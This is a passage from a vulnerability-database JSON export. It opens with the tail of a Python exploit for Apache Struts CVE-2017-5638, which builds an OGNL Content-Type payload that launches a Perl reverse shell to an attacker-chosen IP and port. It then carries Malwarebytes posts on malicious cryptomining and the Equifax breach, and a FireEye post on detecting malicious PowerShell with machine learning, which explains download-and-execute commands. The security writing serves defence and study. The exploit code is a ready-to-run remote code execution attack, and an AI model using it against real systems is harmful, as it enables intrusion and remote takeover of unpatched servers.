p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' 
AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt"}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. 
Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. 
In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kit campaigns\n\nEven malware authors have caught the cryptocurrency bug. Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular, have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. 
Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. 
Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. 
The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with the popular [American news website Salon[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. 
While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn addition to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and a weakness, in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. 
This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. 
Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some respects, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be underestimated. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the guise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", 
"bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. 
We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the [site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And it [isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit.\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. The vulnerability announced on Sept. 4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. 
The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. 
More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "title": "Equifax breach: What you need to know [updated]", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber 
threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell have made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. 
In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). 
It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a Base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * The _new-object_ cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ method will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. 
The flexible PowerShell syntax imposes combinatorial complexity challenges on signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that comprised malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was synonymy, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. 
In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\n| NLP Key Modules | Functionality |\n|---|---|\n| Decoder | Detect and decode any encoded text |\n| Named Entity Recognition (NER) | Detect and recognize any entities such as IP, URL, Email, Registry key, etc. |\n| Tokenizer | Tokenize the PowerShell command into a list of tokens |\n| Stemmer | Stem tokens into a semantically identical token, using the trie |\n| Vocabulary Vectorizer | Vectorize the list of tokens into a machine learning friendly format |\n| Supervised classifier | Binary classification algorithms: Kernel Support Vector Machine, Gradient Boosted Trees, Deep Neural Networks |\n| Reasoning | The explanation of why the prediction was made. Enables analysts to validate predictions. |
\n\nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, but were detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. 
In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 